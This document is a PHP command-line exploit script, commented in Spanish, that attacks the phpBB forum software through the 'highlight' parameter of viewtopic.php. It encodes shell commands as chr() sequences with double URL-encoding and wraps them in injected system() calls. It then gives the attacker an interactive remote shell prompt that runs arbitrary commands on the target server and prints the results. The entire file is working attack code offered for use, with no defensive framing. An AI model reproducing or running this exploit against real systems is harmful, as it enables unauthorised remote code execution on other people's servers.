#!/usr/bin/php -q

PHPBB shell coded by HiDaRK Based on simkin code
comando exit para salir

<?php

#VARIABLES
$host = "";
$phpbbdir = "";
$topic = "";
$entrada = "";
$comando = "";
$action = "";
$line = "";
$flag = FALSE;
$separador = "===BadcheckSum===";

#DEFINIMOS STDIN PARA LEER DESDE EL TECLADO
if(!defined('STDIN')) {
    define('STDIN', fopen('php://stdin', 'r'));
}
#ARGUMENTOS
if($argc < 3) {
    printf("%s\n\n", "Uso: $argv[0] <Host> <Direcctorio PHPBB> <Topic Valido>");
    exit();
}
$host = $argv[1];
$phpbbdir = $argv[2];
$topic = $argv[3];

while($entrada != "exit") {
    #CREAMOS SOCKETS
    $flag=FALSE;
    $sock = fsockopen($host,80);
    if(!$sock) {
        printf("%s\n","Error: no se puede conectar a $host");
        exit();
    }
    printf("%s","nobody@$host:>");
    #SACAMOS LA CADENA MALIGNA
    $entrada = fgets(STDIN, 4096);
    $entrada = trim($entrada);
    if(strcmp($entrada,"exit") == 0) {
        print "saliendo";
        exit();
    }
    $entrada = "$entrada 2>&1; echo $separador";
    $comando = str2chr($entrada);
    $action = "$phpbbdir/viewtopic.php?t=$topic&highlight=%2527%252esystem(".$comando.")%252e%2527";
    fputs($sock,"GET http://$host".$action." \r\n\r\n");
    while($line = fgets($sock,4024)) {
        if($flag == FALSE && (strstr($line,$separador) == TRUE)) {
            $flag = 1;
            $line = "";
        }
        if($flag == TRUE && (strstr($line,$separador) == TRUE)) {
            break;
        }
        if($flag == TRUE && (strstr($line,$separador) == FALSE)) {
            print $line;
        };
    }

    $buffer = "";
    fclose($sock);
}

function str2chr($str){
    for($i = 0;$i < strlen($str);$i++){
        $chr .= "chr(".ord($str{$i}).")";
    if ($i != strlen($str) -1)
        $chr .= "%252e";
    }
    return $chr;
}
?>